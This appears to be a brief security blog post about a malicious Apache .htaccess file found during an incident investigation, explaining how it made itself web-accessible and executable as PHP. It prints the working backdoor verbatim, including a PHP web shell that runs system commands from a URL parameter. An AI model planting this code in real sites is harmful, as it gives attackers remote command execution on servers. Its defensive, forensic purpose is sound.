On servers running Apache, .htaccess files can be an extremely useful tool, allowing clients to modify the behavior of of their web environment from a file on their site, rather than requiring modifications to the server’s underlying configurations.
Because .htaccess is so powerful in this way, it is often abused by malicious parties. While I’ll save most of those methods for other posts, I found this particular incident and methodology to be noteworthy.
During an investigation, I located an .htaccess file which contained the following code:
<Files ~ "^\.ht"> Order allow, deny Allow from all </Files> AddType application/x-httpd-php .htaccess <?php passthru($_GET['cmd']); ?>
This uses the functionality inherent in the .htaccess file itself to:
- Allow the .htaccess file itself to be accessed remotely by the attacker
- Allow code contained within the file to execute as PHP
- Contains a PHP backdoor which executes system commands passed to it in the GET parameter “cmd”
It is always wise to investigate .htaccess files on known-compromised sites for evidence of malicious additions of all types. I will discuss additional .htaccess attack types in later posts.